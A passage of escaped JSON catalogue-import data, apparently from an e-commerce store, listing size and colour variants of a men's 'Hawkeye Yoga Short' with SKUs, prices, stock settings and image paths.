\\/>&bull; Medium=8.0\\\" (21.0cm) inseam.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"29\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"hawkeye-yoga-short-33-black\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/s\\/msh05-black_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/s\\/msh05-black_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/s\\/msh05-black_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=33,color=Black\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/m\\/s\\/msh05-black_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/s\\/msh05-black_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Bottom\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"33\",\"color\":\"Black\"},\"882\":{\"sku\":\"MSH05-33-Blue\",\"store_view_code\":null,\"attribute_set_code\":\"Bottom\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Bottoms\\/Shorts,Default Category\\/Collections\\/Performance Fabrics,Default Category\",\"product_websites\":\"base\",\"name\":\"Hawkeye Yoga Short-33-Blue\",\"description\":\"<p>What more do you need than a sporty yoga short made with organic cotton and a little spandex for mobility? The Hawkeye Yoga Short brings a stylish, standard fit you can sport with confidence outside the studio.<\\/p>\\n<p>&bull; Dark gray shorts with red accents.<br \\/>&bull; 92% Organic Cotton 8% Spandex.<br \\/>&bull; Breathable stretch organic cotton.<br \\/>&bull; Medium=8.0\\\" (21.0cm) inseam.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"29\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"hawkeye-yoga-short-33-blue\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/s\\/msh05-blue_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/s\\/msh05-blue_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/s\\/msh05-blue_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=33,color=Blue\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/m\\/s\\/msh05-blue_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/s\\/msh05-blue_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Bottom\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"33\",\"color\":\"Blue\"},\"883\":{\"sku\":\"MSH05-33-Gray\",\"store_view_code\":null,\"attribute_set_code\":\"Bottom\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Bottoms\\/Shorts,Default Category\\/Collections\\/Performance Fabrics,Default Category\",\"product_websites\":\"base\",\"name\":\"Hawkeye Yoga Short-33-Gray\",\"description\":\"<p>What more do you need than a sporty yoga short made with organic cotton and a little spandex for mobility? The Hawkeye Yoga Short brings a stylish, standard fit you can sport with confidence outside the studio.<\\/p>\\n<p>&bull; Dark gray shorts with red accents.<br \\/>&bull; 92% Organic Cotton 8% Spandex.<br \\/>&bull; Breathable stretch organic cotton.<br \\/>&bull; Medium=8.0\\\" (21.0cm) inseam.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"29\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"hawkeye-yoga-short-33-gray\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/s\\/msh05-gray_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/s\\/msh05-gray_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/s\\/msh05-gray_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=33,color=Gray\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/m\\/s\\/msh05-gray_alt1.jpg,\\/m\\/s\\/msh05-gray_back.jpg\",\"image\":\"\\/m\\/s\\/msh05-gray_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/s\\/msh05-gray_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/m\\/s\\/msh05-gray_alt1.jpg,\\/m\\/s\\/msh05-gray_back.jpg\",\"_store\":null,\"_attribute_set\":\"Bottom\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"33\",\"color\":\"Gray\"},\"884\":{\"sku\":\"MSH05-34-Black\",\"store_view_code\":null,\"attribute_set_code\":\"Bottom\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Bottoms\\/Shorts,Default Category\\/Collections\\/Performance Fabrics,Default Category\",\"product_websites\":\"base\",\"name\":\"Hawkeye Yoga Short-34-Black\",\"description\":\"<p>What more do you need than a sporty yoga short made with organic cotton and a little spandex for mobility? The Hawkeye Yoga Short brings a stylish, standard fit you can sport with confidence outside the studio.<\\/p>\\n<p>&bull; Dark gray shorts with red accents.<br \\/>&bull; 92% Organic Cotton 8% Spandex.<br \\/>&bull; Breathable stretch organic cotton.<br \\/>&bull; Medium=8.0\\\" (21.0cm) inseam.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"29\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"hawkeye-yoga-short-34-black\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/s\\/msh05-black_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/s\\/msh05-black_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/s\\/msh05-black_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=34,color=Black\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/m\\/s\\/msh05-black_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/s\\/msh05-black_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Bottom\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"34\",\"color\":\"Black\"},\"885\":{\"sku\":\"MSH05-34-Blue\",\"store_view_code\":null,\"attribute_set_code\":\"Bottom\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Bottoms\\/Shorts,Default Category\\/Collections\\/Performance Fabrics,Default Category\",\"product_websites\":\"base\",\"name\":\"Hawkeye Yoga Short-34-Blue\",\"description\":\"<p>What more do you need than a sporty yoga short made with organic cotton and a little spandex for mobility? The Hawkeye Yoga Short brings a stylish, standard fit you can sport with confidence outside the studio.<\\/p>\\n<p>&bull; Dark gray shorts with red accents.<br \\/>&bull; 92% Organic Cotton 8% Spandex.<br \\/>&bull; Breathable stretch organic cotton.<br \\/>&bull; Medium=8.0\\\" (21.0cm) inseam.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"29\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"hawkeye-yoga-short-34-blue\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/s\\/msh05-blue_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/s\\/msh05-blue_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/s\\/msh05-blue_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=34,color=Blue\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/m\\/s\\/msh05-blue_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/s\\/msh05-blue_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Bottom\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"34\",\"color\":\"Blue\"},\"886\":{\"sku\":\"MSH05-34-Gray\",\"store_view_code\":null,\"attribute_set_code\":\"Bottom\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Bottoms\\/Shorts,Default Category\\/Collections\\/Performance Fabrics,Default Category\",\"product_websites\":\"base\",\"name\":\"Hawkeye Yoga Short-34-Gray\",\"description\":\"<p>What more do you need than a sporty yoga short made with organic cotton and a little spandex for mobility? The Hawkeye Yoga Short brings a stylish, standard fit you can sport with confidence outside the studio.<\\/p>\\n<p>&bull; Dark gray shorts with red accents.<br \\/>&bull; 92% Organic Cotton 8% Spandex.<br \\/>&bull; Breathable stretch organic cotton.<br \\/>&bull; Medium=8.0\\\" (21.0cm) inseam.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"29\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"hawkeye-yoga-short-34-gray\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/s\\/msh05-gray_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/s\\/msh05-gray_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/s\\/msh05-gray_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=34,color=Gray\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/m\\/s\\/msh05-gray_alt1.jpg,\\/m\\/s\\/msh05-gray_back.jpg\",\"image\":\"\\/m\\/s\\/msh05-gray_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/s\\/msh05-gray_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/m\\/s\\/msh05-gray_alt1.jpg,\\/m\\/s\\/msh05-gray_back.jpg\",\"_store\":null,\"_attribute_set\":\"Bottom\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"34\",\"color\":\"Gray\"},\"887\":{\"sku\":\"MSH05-36-Black\",\"store_view_code\":null,\"attribute_set_code\":\"Bottom\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Bottoms\\/Shorts,Default Category\\/Collections\\/Performance Fabrics,Default Category\",\"product_websites\":\"base\",\"name\":\"Hawkeye Yoga Short-36-Black\",\"description\":\"<p>What more do you need than a sporty yoga short made with organic cotton and a little spandex for mobility? The Hawkeye Yoga Short brings a stylish, standard fit you can sport with confidence outside the studio.<\\/p>\\n<p>&bull; Dark gray shorts with red accents.<br \\/>&bull; 92% Organic Cotton 8% Spandex.<br \\/>&bull; Breathable stretch organic cotton.<br \\/>&bull; Medium=8.0\\\" (21.0cm) inseam.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"29\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"hawkeye-yoga-short-36-black\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/s\\/msh05-black_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/s\\/msh05-black_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/s\\/msh05-black_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=36,color=Black\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/m\\/s\\/msh05-black_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/s\\/msh05-black_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Bottom\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"36\",\"color\":\"Black\"},\"888\":{\"sku\":\"MSH05-36-Blue\",\"store_view_code\":null,\"attribute_set_code\":\"Bottom\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Bottoms\\/Shorts,Default Category\\/Collections\\/Performance Fabrics,Default Category\",\"product_websites\":\"base\",\"name\":\"Hawkeye Yoga Short-36-Blue\",\"description\":\"<p>What more do you need than a sporty yoga short made with organic cotton and a little spandex for mobility? The Hawkeye Yoga Short brings a stylish, standard fit you can sport with confidence outside the studio.<\\/p>\\n<p>&bull; Dark gray shorts with red accents.<br \\/>&bull; 92% Organic Cotton 8% Spandex.<br \\/>&bull; Breathable stretch organic cotton.<br \\/>&bull; Medium=8.0\\\" (21.0cm) inseam.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"29\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"hawkeye-yoga-short-36-blue\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/s\\/msh05-blue_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/s\\/msh05-blue_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/s\\/msh05-blue_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=36,color=Blue\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/m\\/s\\/msh05-blue_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/s\\/msh05-blue_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Bottom\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"36\",\"color\":\"Blue\"},\"889\":{\"sku\":\"MSH05-36-Gray\",\"store_view_code\":null,\"attribute_set_code\":\"Bottom\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Bottoms\\/Shorts,Default Category\\/Collections\\/Performance Fabrics,Default Category\",\"product_websites\":\"base\",\"name\":\"Hawkeye Yoga Short-36-Gray\",\"description\":\"<p>What more do you need than a sporty yoga short made with organic cotton and a little spandex for mobility? The Hawkeye Yoga Short brings a stylish, standard fit you can sport with confidence outside the studio.<\\/p>\\n<p>&bull; Dark gray shorts with red accents.<br \\/>&bull; 92% Organic Cotton 8% Spandex.<br \\/>&bull; Breathable stretch organic cotton.<br \\/>&bull; Medium=8.0\\\" (21.0cm) inseam.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"29\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"hawkeye-yoga-short-36-gray\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/s\\/msh05-gray_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/s\\/msh05-gray_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/s\\/msh05-gray_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=36,color=Gray\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/m\\/s\\/msh05-gray_alt1.jpg,\\/m\\/s\\/msh05-gray_back.jpg\",\"image\":\"\\/m\\/s\\/msh05-gray_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/s\\/msh05-gray_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/m\\/s\\/msh05-gray_alt1.jpg,\\/m\\/s\\/msh05-gray_back.jpg\",\"_store\":null,\"_attribute_set\":\"Bottom\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\